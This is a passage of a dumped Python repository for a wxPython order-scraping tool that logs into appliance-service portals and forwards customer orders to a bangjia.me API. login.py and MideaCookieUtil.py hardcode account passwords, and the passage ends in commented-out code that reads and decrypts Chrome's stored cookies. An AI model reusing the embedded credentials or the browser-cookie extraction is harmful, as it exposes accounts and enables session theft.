self.listCtrl.SetItem(index, 4, 0 if '3' not in data else data['3'])\n self.listCtrl.SetItem(index, 5, 0 if '4' not in data else data['4'])\n self.listCtrl.SetItem(index, 6, 0 if '5' not in data else data['5'])\n self.listCtrl.SetItemImage(self.listCtrl.GetItemCount() - 1, self.img_idx)\n\n # Alternate the row colors of a ListCtrl.\n # Mike Driscoll... thank you !\n if index % 2:\n self.listCtrl.SetItemBackgroundColour(index, \"#ffffff\")\n else:\n self.listCtrl.SetItemBackgroundColour(index, \"#ece9d8\") # ecf3fd\n\n @ staticmethod\n def OnAbout(event):\n message = \"\"\"wangdian.bangjia.me\\n\n 帮家报表管理系统\n 使用wxPython开发.\\n\n 当前版本 : %.1f\"\"\" % VERSION\n\n wx.MessageBox(message,\n AppTitle,\n wx.OK)\n\n def OnClose(self):\n ret = wx.MessageBox(\"确定要退出吗 ?\",\n AppTitle,\n wx.YES_NO | wx.ICON_QUESTION |\n wx.CENTRE | wx.NO_DEFAULT)\n\n return ret\n\n def OnExit(self, event):\n # Ask for exit.\n intChoice = self.OnClose()\n\n if intChoice == 2:\n # Disconnect from server.\n # self.con.OnCloseDb()\n self.Destroy()\n\n def OnTimer(self, event):\n t = time.localtime(time.time())\n sbTime = time.strftime(\"当前时间 %d/%m/%Y are %H:%M:%S\", t)\n self.myStatusBar.SetStatusText(sbTime, 0)\n\n\nclass MyApp(wx.App, wx.lib.mixins.inspection.InspectionMixin):\n\n def OnInit(self, redirect=False, filename=None, useBestVisual=False, clearSigInt=True):\n self.SetAppName(\"帮家报表系统\")\n self.InitInspection()\n self.installDir = os.path.split(os.path.abspath(sys.argv[0]))[0]\n self.locale = wx.Locale(wx.LANGUAGE_CHINESE_SIMPLIFIED)\n print(\"OnInit sys.argv[0]={}\".format(sys.argv[0]))\n print(\"OnInit installDir={}\".format(self.installDir))\n frame = MyFrame(None, -1, title=\"\")\n frame.SetSize(800, 527)\n self.SetTopWindow(frame)\n frame.Center()\n frame.Show(True)\n\n return True\n\n def GetInstallDir(self):\n \"\"\"\n Returns the installation directory for my application.\n \"\"\"\n\n return self.installDir\n\n def GetIconsDir(self):\n \"\"\"\n Returns the icons directory for my application.\n \"\"\"\n\n icons_dir = os.path.join(self.installDir, \"icons\")\n return icons_dir\n\n def GetBitmapsDir(self):\n \"\"\"\n Returns the bitmaps directory for my application.\n \"\"\"\n\n bitmaps_dir = os.path.join(self.installDir, \"bitmaps\")\n return bitmaps_dir\n\n\ndef main():\n app = MyApp(redirect=False)\n app.MainLoop()\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5347784161567688,
"alphanum_fraction": 0.5571012496948242,
"avg_line_length": 34.1136360168457,
"blob_id": "b16c7cf17c7d6b2f2b831507e1f169fcbf294057",
"content_id": "6f8d26aac650162ed5718f6a6f8037987c6b5905",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3151,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 88,
"path": "/test_text.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport time\n\nimport wx\nimport wx.adv\n\n#----------------------------------------------------------------------\n\nclass TestPanel(wx.Panel):\n def __init__(self, parent, log):\n self.log = log\n wx.Panel.__init__(self, parent, -1)\n textSizer = wx.BoxSizer(wx.VERTICAL)\n # self.stEmployees = wx.StaticText(self, -1, \"你好,这个是测试文本\", style=wx.ALIGN_CENTER)\n # self.stEmployees.SetForegroundColour(\"gray\")\n # self.stEmployees.SetFont(font)\n # textSizer.Add(self.stEmployees, flag=wx.CENTER)\n title = wx.StaticText(self, -1, \"This is an example of static text\", style=wx.ALIGN_CENTER)\n center = wx.StaticText(self, -1, \"align center\", style=wx.ALIGN_CENTER)\n center.SetForegroundColour('white')\n center.SetBackgroundColour('black')\n textSizer.Add(title, 0, wx.EXPAND, 10)\n textSizer.Add(center, 0, wx.EXPAND, 10)\n self.SetSizer(textSizer)\n textSizer.Fit(self)\n\n import datetime\n\n def subtime(date1, date2):\n date1 = datetime.datetime.strptime(date1, \"%Y-%m-%d %H:%M:%S\")\n date2 = datetime.datetime.strptime(date2, \"%Y-%m-%d %H:%M:%S\")\n\n return date2 - date1\n\n date1 = r'2015-06-19 02:38:01'\n date2 = r'2015-06-18 05:31:22'\n\n # print(time.gmtime())\n print(subtime(date1, date2)) # date1 > date2\n print(subtime(date2, date1)) # date1 < date2\n\n nowdate = datetime.datetime.now() # 获取当前时间\n nowdate = nowdate.strftime(\"%Y-%m-%d %H:%M:%S\") # 当前时间转换为指定字符串格式\n print(subtime(date2, nowdate)) # nowdate > date2\n\n # In some cases the widget used above will be a native date\n # picker, so show the generic one too.\n # dpc = wx.adv.DatePickerCtrlGeneric(self, size=(120,-1),\n # style = wx.TAB_TRAVERSAL\n # | wx.adv.DP_DROPDOWN\n # | wx.adv.DP_SHOWCENTURY\n # | wx.adv.DP_ALLOWNONE )\n # self.Bind(wx.adv.EVT_DATE_CHANGED, self.OnDateChanged, dpc)\n # sizer.Add(dpc, 0, wx.LEFT, 50)\n\n\n def OnDateChanged(self, evt):\n self.log.write(\"OnDateChanged: %s\\n\" % evt.GetDate())\n\n#----------------------------------------------------------------------\n\ndef runTest(frame, nb, log):\n win = TestPanel(nb, log)\n return win\n\n#----------------------------------------------------------------------\n\n\n\noverview = \"\"\"<html><body>\n<h2><center>wx.DatePickerCtrl</center></h2>\n\nThis control allows the user to select a date. Unlike\nwx.calendar.CalendarCtrl, which is a relatively big control,\nwx.DatePickerCtrl is implemented as a small window showing the\ncurrently selected date. The control can be edited using the keyboard,\nand can also display a popup window for more user-friendly date\nselection, depending on the styles used and the platform.\n\n</body></html>\n\"\"\"\n\n\n\nif __name__ == '__main__':\n import sys,os\n import run\n run.main(['', os.path.basename(sys.argv[0])] + sys.argv[1:])\n\n"
},
{
"alpha_fraction": 0.5839999914169312,
"alphanum_fraction": 0.6320000290870667,
"avg_line_length": 30,
"blob_id": "962b6ed81254138d837c59826ce95042590d9750",
"content_id": "a3bc119ef19887083af990cf86cdb9d8bdae4b5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 125,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 4,
"path": "/test/test_re.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import re\n\nstring = \"originOrgId: 'WDCN02431',\"\nprint(re.findall(re.compile(r\"originOrgId: ['](.*?)[']\", re.S), string)[0])\n\n"
},
{
"alpha_fraction": 0.5661259293556213,
"alphanum_fraction": 0.5760241746902466,
"avg_line_length": 35.0098991394043,
"blob_id": "cbb7d888d6f70bc087a3b84e9685de3f8cd234a8",
"content_id": "b4b802fab316fe396f2120431bfd0ff4310f77a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3659,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 101,
"path": "/Util.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import json\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nclass Util(object):\n @staticmethod\n def get_value(element):\n return element[\"value\"]\n\n @staticmethod\n def get_selected(element):\n results = element.select('option[selected=\"selected\"]')\n if results and len(results) > 0:\n return results[0]['value'] or ''\n option = element.find(\"option\")\n if option:\n return option['value'] or ''\n return ''\n\n @staticmethod\n def getsoup(response):\n # print(response.status_code)\n response.encoding = 'utf-8'\n return BeautifulSoup(response.text, features=\"lxml\")\n\n @staticmethod\n def finda(element):\n return element.find(\"a\").text.strip()\n\n @staticmethod\n def findspan(element):\n return element.find(\"span\").text.strip()\n\n @staticmethod\n def isNew(data, bjdomain, adminid):\n res = requests.post(bjdomain + \"/Api/Climborder/checkexist\",\n data={\"orderno\": data['factorynumber'], 'adminid': adminid})\n return Util.checkBjRes(res)\n\n @staticmethod\n def getAccount(bjdomain):\n try:\n res = requests.post(bjdomain + \"/Api/Climborder/newgetaccount\", data={\"mobile\": \"18205169014\"})\n if res.status_code == 200 and res.text:\n result = json.loads(res.text)\n if 'ret' not in result or int(result['ret']) != 0 or 'element' not in result or not result['element']:\n return None\n for factory in result['element']:\n if 'factoryid' in factory and int(factory['factoryid']) == 10002 and len(factory['accounts']) > 0:\n return factory['accounts'][0]\n else:\n return None\n except Exception as e:\n print(\"getaccount failed:\", e)\n return None\n return None\n\n @staticmethod\n def clearKey(data, datakey, destkey='address'):\n if datakey in data and data[destkey] and data[destkey].strip().startswith(data[datakey].strip()):\n data[destkey] = data[destkey].replace(data[datakey], '', 1).strip()\n return data\n\n @staticmethod\n def clearAddress(orderinfo, destkey='address'):\n if destkey not in orderinfo:\n return orderinfo\n orderinfo = Util.clearKey(orderinfo, \"province\", destkey)\n orderinfo = Util.clearKey(orderinfo, \"city\", destkey)\n orderinfo = Util.clearKey(orderinfo, \"county\", destkey)\n orderinfo = Util.clearKey(orderinfo, \"town\", destkey)\n return orderinfo\n\n @staticmethod\n def checkBjRes(response):\n if response.status_code == 200 and response.text:\n result = json.loads(response.text)\n return 'ret' in result and int(result['ret']) == 0\n return False\n\n @staticmethod\n def getTableRow(bsObj, id, func, row_no=None, truncate=True):\n \"\"\"@truncate: 是否截取掉最后一个字符\"\"\"\n table = bsObj.find(\"table\", {\"id\": id})\n if not table:\n return \"\"\n alltr = table.find(\"tbody\").find_all(\"tr\")\n result = \"\"\n if row_no is not None and isinstance(row_no, int):\n if (0 <= row_no < len(alltr)) or (row_no < 0 and len(alltr) >= -row_no):\n return func(alltr[row_no].find_all(\"td\")) if alltr[row_no] else \"\"\n for tr in alltr:\n note_td = tr.find_all(\"td\")\n if note_td and len(note_td) > 2:\n item = func(note_td)\n result = result + item\n if truncate and result and len(result) > 0:\n result = result[:-1]\n return result\n"
},
{
"alpha_fraction": 0.8053691387176514,
"alphanum_fraction": 0.8389261960983276,
"avg_line_length": 7.277777671813965,
"blob_id": "8ba4b6df0e9c68e8dc4574bab0c0f464f6f7867b",
"content_id": "eb2cfdb21c09c86def36b71d666e7ac2bc1f9959",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 149,
"license_type": "no_license",
"max_line_length": 14,
"num_lines": 18,
"path": "/requirement.txt",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "apscheduler\n#pyupdater\n#wxpython\n#requests-html\ncryptography\n#pywin32\nrequests\n#pycrypto\nhyper\nhttpx\nlxml\n\npyaes\npbkdf2\nkeyring\nlz4\npycryptodome\nbs4\n"
},
{
"alpha_fraction": 0.5731832385063171,
"alphanum_fraction": 0.5815290212631226,
"avg_line_length": 34.87853240966797,
"blob_id": "5412032824b3b5e834384af0ef8965cd214d06b0",
"content_id": "699bb8dd6dd508ae26c6b9fb97ce6f9054cba8a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12995,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 354,
"path": "/login.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import datetime\nimport json\nimport os\nimport sys\nimport time\n\nimport wx\nimport wx.adv\nimport wx.lib.mixins.inspection\nfrom apscheduler.triggers import interval\n\nfrom CDKUtil import CDKUtil\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\nscheduler = BackgroundScheduler()\n\nAppTitle = \"CDK抓单\"\nVERSION = 0.1\n\n\ndef refresh_order(frame):\n print(\"refresh_order frame={}\".format(frame))\n success = wx.GetApp().cdkutil.loadHaierOrder()\n if not success:\n wx.GetApp().logout(frame)\n else:\n wx.GetApp().addCount()\n wx.GetApp().setLast()\n\n\nclass MainFrame(wx.Frame):\n def __init__(self, userinfo):\n wx.Frame.__init__(self, parent=None, title='CDK抓单中...')\n self.loginTime = wx.GetApp().GetLoginTime()\n self.userinfo = userinfo\n self.makeStatusBar()\n self.initText()\n\n self.OnTimer(None)\n\n self.timer = wx.Timer(self)\n self.timer.Start(3000)\n self.Bind(wx.EVT_TIMER, self.OnTimer)\n wx.GetApp().startJob(self)\n\n def initText(self):\n textSizer = wx.BoxSizer(wx.VERTICAL)\n self.main_txt = wx.StaticText(self, -1, \"登录时长 %s\".format(MyApp.getCurrentDateTime() - self.loginTime),\n style=wx.ALIGN_CENTER)\n self.count_txt = wx.StaticText(self, -1, \"同步次数:{}\".format(wx.GetApp().getCount()), style=wx.ALIGN_CENTER)\n self.last_txt = wx.StaticText(self, -1, \"最近更新时间:{}\".format(wx.GetApp().getLast()), style=wx.ALIGN_CENTER)\n # center.SetForegroundColour('white')\n # center.SetBackgroundColour('black')\n textSizer.Add(self.main_txt, 0, wx.EXPAND, 10)\n textSizer.Add(self.count_txt, 0, wx.EXPAND, 10)\n textSizer.Add(self.last_txt, 0, wx.EXPAND, 10)\n self.SetSizer(textSizer)\n textSizer.Fit(self)\n\n def OnTimer(self, event):\n t = MyApp.getCurrentDateTime()\n sbTime = \"当前时间 {}\".format(t.strftime(\"%Y-%m-%d %H:%M:%S\"))\n self.myStatusBar.SetStatusText(sbTime, 0)\n self.main_txt.SetLabel(\"登录时长 {}\".format(t - self.loginTime))\n self.count_txt.SetLabel(\"同步次数:{}\".format(wx.GetApp().getCount()))\n self.last_txt.SetLabel(\"最近更新时间:{}\".format(wx.GetApp().getLast()))\n self.Layout()\n\n def makeStatusBar(self):\n self.myStatusBar = self.CreateStatusBar(1)\n self.myStatusBar.SetFieldsCount(2)\n self.myStatusBar.SetStatusWidths([-8, -4])\n self.myStatusBar.SetStatusText(\"\", 0)\n self.myStatusBar.SetStatusText(\"bangjia.me.\", 1)\n\n\nclass LoginFrame(wx.Frame):\n def __init__(self):\n wx.Frame.__init__(self, parent=None, title=AppTitle)\n # panel = wx.Panel(self)\n self.main_sizer = wx.BoxSizer(wx.VERTICAL)\n\n userInfo = wx.GetApp().getUserInfo()\n if userInfo and 'username' in userInfo:\n default_name = userInfo['username']\n else:\n default_name = \"66004185\"\n\n if userInfo and 'passwd' in userInfo:\n default_pwd = userInfo['passwd']\n else:\n default_pwd = \"Dw147259\"\n\n self.txt_username = wx.TextCtrl(self, value=default_name)\n self.add_widgets(\"账号\", self.txt_username)\n\n self.txt_password = wx.TextCtrl(self, value=default_pwd, style=wx.TE_PASSWORD)\n self.add_widgets(\"密码\", self.txt_password)\n\n self.txt_code = wx.TextCtrl(self, value=\"\")\n # 添加验证码图片,并加入页面布局,为第三行,第3列\n # image = wx.Image(os.path.join(wx.GetApp().resource_path(''), \"bitmaps\",'item_empty.png'),\n # wx.BITMAP_TYPE_PNG).Rescale(80, 25).ConvertToBitmap() # 获取图片,转化为Bitmap形式\n self.img_code = wx.StaticBitmap(self, -1) # 转化为wx.StaticBitmap()形式\n self.img_code.Bind(wx.EVT_LEFT_DOWN, self.loadCodeImg)\n self.add_widgets(\"验证码\", self.txt_code).Add(self.img_code, 0, wx.ALL, 5)\n\n # self.title = wx.TextCtrl(self, value=\"\")\n # self.add_widgets(\"验证码\", self.title)\n\n btn_sizer = wx.BoxSizer()\n save_btn = wx.Button(self, label=\"登录\")\n save_btn.Bind(wx.EVT_BUTTON, self.on_save)\n\n exit_btn = wx.Button(self, label=\"退出\")\n exit_btn.Bind(wx.EVT_BUTTON, self.on_exit)\n btn_sizer.Add(save_btn, 0, wx.ALL, 5)\n btn_sizer.Add(exit_btn, 0, wx.ALL, 5)\n # btn_sizer.Add(wx.Button(self, id=wx.ID_CANCEL), 0, wx.ALL, 5)\n self.main_sizer.Add(btn_sizer, 0, wx.CENTER)\n\n self.SetSizer(self.main_sizer)\n self.loadCodeImg()\n self.Show()\n self.main_window = None\n\n self.Bind(wx.EVT_BUTTON, self.OnExit, exit_btn)\n self.Bind(wx.EVT_CLOSE, self.OnExit)\n\n def add_widgets(self, label_text, text_ctrl):\n row_sizer = wx.BoxSizer(wx.HORIZONTAL)\n label = wx.StaticText(self, label=label_text, size=(50, -1))\n row_sizer.Add(label, 0, wx.ALL, 5)\n row_sizer.Add(text_ctrl, 1, wx.ALL | wx.EXPAND, 5)\n self.main_sizer.Add(row_sizer, 0, wx.EXPAND)\n return row_sizer\n\n def loadCodeImg(self, event=None):\n # response = requests.get(url)\n # img = Image.open(BytesIO(response.content))\n img = wx.GetApp().cdkutil.generateCode()\n # image = wx.Image(img.size[0], img.size[1])\n image = wx.Image(img.size[0], img.size[1])\n image.SetData(img.convert(\"RGB\").tobytes())\n self.img_code.SetBitmap(image.Rescale(80, 25).ConvertToBitmap())\n\n def on_save(self, event):\n print(\"登录\")\n # 开始登录,登录成功后保存信息到本地\n username = self.txt_username.GetValue()\n passwd = self.txt_password.GetValue()\n code = self.txt_code.GetValue()\n wx.GetApp().cdkutil.username = username\n wx.GetApp().cdkutil.passwd = passwd\n success = wx.GetApp().cdkutil.checkCode(code, username, passwd)\n print(\"登录 success: {}\".format(success))\n # todo 写入文件?\n if success:\n wx.GetApp().SetLoginTime()\n self.main_window = MainFrame(wx.GetApp().getUserInfo())\n self.main_window.SetSize(800, 527)\n self.main_window.Center()\n self.main_window.Show(True)\n self.Hide()\n self.main_window.Bind(wx.EVT_CLOSE, self.on_exit)\n else:\n wx.GetApp().cdkutil.token = ''\n userinfo = {\"username\": username, \"passwd\": passwd, \"token\": '', 'islogin': False, 'orderurl': ''}\n wx.GetApp().setUserInfo(userinfo)\n\n def on_exit(self, event):\n print(\"exit\")\n user = wx.GetApp().getUserInfo()\n # closed_window = event.EventObject\n # if closed_window == self.main_window:\n # self.main_window = None\n # self.Show()\n # elif closed_window == self:\n # print('Carry out your code for when Main window closes')\n # event.Skip()\n self.OnExit(event)\n\n def OnClose(self):\n ret = wx.MessageBox(\"确定要退出吗 ?\",\n AppTitle,\n wx.YES_NO | wx.ICON_QUESTION |\n wx.CENTRE | wx.NO_DEFAULT)\n return ret\n\n def OnExit(self, event):\n # Ask for exit.\n print(\"OnExit\")\n print(event)\n intChoice = self.OnClose()\n print(intChoice)\n\n if intChoice == 2:\n # Disconnect from server.\n # self.con.OnCloseDb()\n # 结束循环任务\n wx.GetApp().stopJob()\n closed_window = event.EventObject\n if closed_window == self.main_window:\n self.main_window.Destroy()\n self.main_window = None\n # self.Show()\n # elif closed_window == self:\n # print('Carry out your code for when Main window closes')\n # event.Skip()\n\n userinfo = wx.GetApp().getUserInfo()\n userinfo['islogin'] = False\n wx.GetApp().setUserInfo(userinfo)\n self.Destroy()\n\n\nclass MyApp(wx.App, wx.lib.mixins.inspection.InspectionMixin):\n\n def OnInit(self, redirect=False, filename=None, useBestVisual=False, clearSigInt=True):\n self.SetAppName(\"CDK抓单\")\n self.InitInspection()\n self.installDir = os.path.split(os.path.abspath(sys.argv[0]))[0]\n # self.installDir = self.resource_path('')\n self.locale = wx.Locale(wx.LANGUAGE_CHINESE_SIMPLIFIED)\n self.loginTime = MyApp.getCurrentDateTime()\n path = os.path.join(self.installDir, \"file\")\n if not os.path.exists(path):\n os.makedirs(path)\n self.userfile = os.path.join(self.installDir, \"file\", \"user.txt\")\n self.apscheduler = BackgroundScheduler()\n self.cdkutil = CDKUtil()\n self.job = None\n self.loginFrame = None\n self.mainFrame = None\n self.count = 1\n self.lasttime = self.loginTime\n\n print(\"OnInit sys.argv[0]={}\".format(sys.argv[0]))\n print(\"OnInit installDir={}\".format(self.installDir))\n userinfo = self.getUserInfo()\n frame = None\n if userinfo and 'islogin' in userinfo and 'token' in userinfo:\n if userinfo['islogin'] and userinfo['token'] and len(userinfo['token']) > 5:\n self.cdkutil.token = userinfo['token']\n self.cdkutil.username = userinfo['username']\n self.cdkutil.passwd = userinfo['passwd']\n self.cdkutil.orderurl = userinfo['orderurl']\n self.mainFrame = MainFrame(userinfo)\n frame = self.mainFrame\n if not self.mainFrame:\n self.loginFrame = LoginFrame()\n frame = self.loginFrame\n frame.SetSize(800, 527)\n self.SetTopWindow(frame)\n frame.Center()\n frame.Show(True)\n\n return True\n\n def getUserInfo(self):\n if os.path.exists(self.userfile):\n with open(self.userfile, 'r') as f:\n userinfo = json.loads(f.read())\n return userinfo\n return None\n\n def setUserInfo(self, userinfo):\n with open(self.userfile, 'w') as f:\n jsObj = json.dumps(userinfo)\n f.write(jsObj)\n\n @staticmethod\n def getCurrentDateTime():\n return datetime.datetime.strptime(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime()), \"%Y-%m-%d %H:%M:%S\")\n\n def SetLoginTime(self):\n self.loginTime = MyApp.getCurrentDateTime()\n # self.loginTime = time.localtime(time.time())\n\n def GetLoginTime(self):\n return self.loginTime\n\n def startJob(self, frame):\n if not self.apscheduler:\n self.apscheduler = BackgroundScheduler()\n self.apscheduler.start()\n if not self.job:\n trigger = interval.IntervalTrigger(seconds=5 * 10)\n self.job = self.apscheduler.add_job(lambda: refresh_order(frame), trigger=trigger, id='task_sync_every_5m',\n replace_existing=True)\n # self.job = self.apscheduler.add_job(func=refresh_order, trigger='interval', args=[frame],\n # id='task_sync_every_5m', seconds=5 * 60)\n\n def stopJob(self):\n # self.apscheduler.shutdown(wait=False)\n if self.job:\n self.job.remove()\n self.job = None\n\n def logout(self, frame):\n print(\"logout\")\n self.stopJob()\n userinfo = self.getUserInfo()\n userinfo['islogin'] = False\n self.setUserInfo(userinfo)\n\n wx.CallAfter(self.test, frame)\n\n def test(self, frame):\n print(\"test frame={}\".format(frame))\n ret = wx.MessageBox(\"账号登录过期,请尝试重新登录\",\n AppTitle,\n wx.OK | wx.ICON_INFORMATION)\n # ret = dialog.ShowModal()\n print(ret)\n if wx.OK == ret:\n print(\"ok pressed\")\n frame.Destroy()\n # a = MyDialog(self.GetTopWindow(), \"Dialog\").ShowModal()\n # print(a)\n\n def addCount(self):\n self.count = self.count + 1\n\n def getCount(self):\n return self.count\n\n def setLast(self):\n self.lasttime = MyApp.getCurrentDateTime()\n\n def getLast(self):\n return self.lasttime\n\n def resource_path(self, relative_path):\n if hasattr(sys, '_MEIPASS'):\n return os.path.join(sys._MEIPASS, relative_path)\n return os.path.join(os.path.abspath(\".\"), relative_path)\n\n\nclass MyDialog(wx.Dialog):\n def __init__(self, parent, title):\n super(MyDialog, self).__init__(parent, title=title, size=(250, 150))\n panel = wx.Panel(self)\n self.btn = wx.Button(panel, wx.ID_OK, label=\"ok\", size=(50, 20), pos=(75, 50))\n self.btn.Bind(wx.EVT_BUTTON, self.on_Ok)\n\n def on_Ok(self, event):\n print(\"MyDialog ok button clicked!!!\")\n self.Close()\n\n\nif __name__ == '__main__':\n app = MyApp(redirect=False)\n app.MainLoop()\n"
},
{
"alpha_fraction": 0.5805268287658691,
"alphanum_fraction": 0.599032998085022,
"avg_line_length": 52.079647064208984,
"blob_id": "898d1435aec507cb92de3ca2b70b81f34a1f2f87",
"content_id": "c78bdbacf2ac5744fbe6294a614a6f4e15e1e52f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6020,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 113,
"path": "/MideaCookieUtil.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import json\nimport time\nfrom datetime import date, timedelta\n\nimport requests\n\nfrom BaseUtil import BaseUtil\nfrom cookie_test import fetch_chrome_cookie\n\n\nclass MideaUtil(BaseUtil):\n\n def __init__(self, username, passwd, adminid='24', factoryid='4', baseurl='https://cs.midea.com/c-css/',\n bjdomain='http://yxgtest.bangjia.me'):\n super(MideaUtil, self).__init__(username, passwd, adminid, factoryid, baseurl, bjdomain)\n self.headers['Accept'] = \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\" \\\n \"*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"\n self.headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'\n\n self.headers['Accept'] = \"*/*\"\n self.headers['Content-Type'] = 'application/json'\n self.cookie = fetch_chrome_cookie([{\"domain\": \".midea.com\"}], isExact=False)\n self.cookies = BaseUtil.getCookies(self.cookie)\n self.headers['Cookie'] = self.cookie\n print(\"init cookie=\", self.cookie)\n\n def loadOrders(self, param=None):\n # 开始加载工单\n try:\n data = {\"data\": json.dumps(self.loadRolesOrder())}\n print(\"loadOrders data=\", data)\n requests.post(self.bjdomain + \"/Api/Climborder/addorder\", data=data)\n except:\n return self.dataverify\n return self.datasuccess\n\n def loadRolesOrder(self):\n roleurl = self.baseurl + \"desktop/userInfo\"\n self.headers['Referer'] = self.baseurl + \"views/css/desktop/index.jsp\"\n response = self.session.post(roleurl, headers=self.headers)\n print(\"userInfo result=\", response.text)\n result = []\n if response.status_code == 200 and response.text:\n roleresult = self.getjson(response)\n if not roleresult or 'status' not in roleresult or not roleresult['status']:\n return self.datafail\n if 'content' not in roleresult or 'orgUsers' not in roleresult['content']:\n return self.datafail\n for org in roleresult['content']['orgUsers']:\n orgId = org['orgEntityVO']['orgCode']\n result = self.merge(result, self.switchOrg(orgId), \"factorynumber\")\n\n def switchOrg(self, orgId):\n roleurl = self.baseurl + \"switchOrg\"\n self.headers['Referer'] = self.baseurl + \"views/css/desktop/index.jsp\"\n params = {\"currentOrg\": orgId, \"loginToken\": self.cookies['loginToken']}\n response = self.session.post(roleurl, headers=self.headers, data=params)\n # self.initCookie()\n # print(\"switchOrg orgId={},params={}, result={} \".format(orgId, params, response.text))\n response = self.session.get(self.baseurl + 'views/css/desktopPlugIn/wd_homePage.jsp', headers=self.headers)\n # print(\"wd_homePage orgId={},params={}, result={} \".format(orgId, params, response.text))\n return list(self.loadPageOrder())\n\n def loadPageOrder(self, page=1, totalcount=100, pageSize=100):\n dataurl = self.baseurl + \"wom/serviceorderunit/listdata\"\n data = {\"page\": page, \"rows\": pageSize, \"pageIndex\": page - 1, \"pageSize\": pageSize,\n \"formConditions\": {\"SERVICE_ORDER_STATUS\": \"\", \"CONTAIN_EJFWS\": \"N\",\n \"CONTACT_TIME\": (date.today() - timedelta(days=3)).strftime(\"%Y-%m-%d\"),\n \"CONTACT_TIME_end\": (date.today()).strftime(\"%Y-%m-%d\")}}\n response = self.session.post(dataurl, headers=self.headers, data=json.dumps(data))\n self.headers['Referer'] = self.baseurl + \"wom/serviceorderunit/list?type=womServiceNotFinshCount\"\n response.encoding = 'utf-8'\n print(\"loadOrders response={}\".format(response.text))\n result = json.loads(response.text)\n if result and 'status' in result and result['status']:\n data = result['content']\n totalcount = data['total']\n pagecount = data['pageCount']\n pageSize = data['pageSize']\n page = data['pageIndex']\n # print(\"totalcount={} pagecount={} pageSize={} page={}\".format(totalcount, pagecount, pageSize, page))\n if page >= pagecount:\n yield from self.parseOrders(data)\n else:\n yield from self.parseOrders(data)\n yield from self.loadPageOrder(page + 1, totalcount, pageSize)\n\n def parseOrders(self, data):\n for item in data['rows']:\n yield {\n 'factorynumber': item['SERVICE_ORDER_NO'], 'ordername': item['SERVICE_SUB_TYPE_NAME'],\n 'username': item['SERVICE_CUSTOMER_NAME'], 'mobile': item['SERVICE_CUSTOMER_TEL1'],\n 'orderstatus': item['SERVICE_ORDER_STATUS'], 'originname': item['ORDER_ORIGIN'],\n 'machinetype': item['PROD_NAME'], 'machinebrand': item['BRAND_NAME'],\n 'sn': '', 'version': item['PRODUCT_MODEL'] if 'PRODUCT_MODEL' in item else '',\n 'repairtime': item['FINAL_APPOINT_TIME'] if 'FINAL_APPOINT_TIME' in item else '',\n 'mastername': item['ENGINEER_NAME'] if 'ENGINEER_NAME' in item else '',\n 'note': item['PUB_REMARK'] if 'PUB_REMARK' in item else '',\n 'companyid': self.factoryid, 'adminid': self.adminid,\n 'address': str(item['SERVICE_CUSTOMER_ADDRESS']),\n # 'province': item['provinceName'], 'city': item['cityName'],\n # 'county': item['regionName'], 'town': item['countyName'],\n 'ordertime': item['CONTACT_TIME'],\n 'description': item['SERVICE_DESC'],\n }\n\n\nif __name__ == '__main__':\n # util = ConkaUtil('K608475', 'Kuser6646!', adminid='20699', factoryid='1')\n # bangjia:13819807915 美的:AW3306009461 Md123456789\n util = MideaUtil('AW3306009461', 'Md123456789!', adminid='24', factoryid='4')\n # util = ConkaUtil('K608069', 'Crm@20200401', adminid='24', factoryid='1')\n print(util.loadOrders())\n"
},
{
"alpha_fraction": 0.6382978558540344,
"alphanum_fraction": 0.6450676918029785,
"avg_line_length": 33.46666717529297,
"blob_id": "8217400e572dda5785b1e4bae99597bea7bc0da6",
"content_id": "acc578fa07c56a00e4a67821a7a38906add444fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1168,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 30,
"path": "/chrome_cookies_old.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import os\nimport sqlite3\nfrom collections import defaultdict\n# from win32.win32crypt import CryptUnprotectData\n\n'''\n实际使用场景请自行修改Cookies/cookies.sqlite位置,下面代码均为默认安装的位置,有些绿色版的文件夹位置以及老版本的渗透版火狐浏览器位置需要自行修改\n'''\n\n\n# # 获取chrome浏览器的cookies\n# def getcookiefromchrome():\n# cookiepath = os.environ['LOCALAPPDATA'] + r\"\\Google\\Chrome\\User Data\\Default\\Cookies\"\n# sql = \"select host_key,name,encrypted_value from cookies\"\n# with sqlite3.connect(cookiepath) as conn:\n# cu = conn.cursor()\n# select_cookie = (cu.execute(sql).fetchall())\n# cookie_list = []\n# for host_key, name, encrypted_value in select_cookie:\n# cookie = CryptUnprotectData(encrypted_value)[1].decode()\n# cookies = {host_key: name + \":\" + cookie}\n# cookie_list.append(cookies)\n# d = defaultdict(list)\n# for cookie_item in cookie_list:\n# for key, value in cookie_item.items():\n# d[key].append(value.strip())\n# 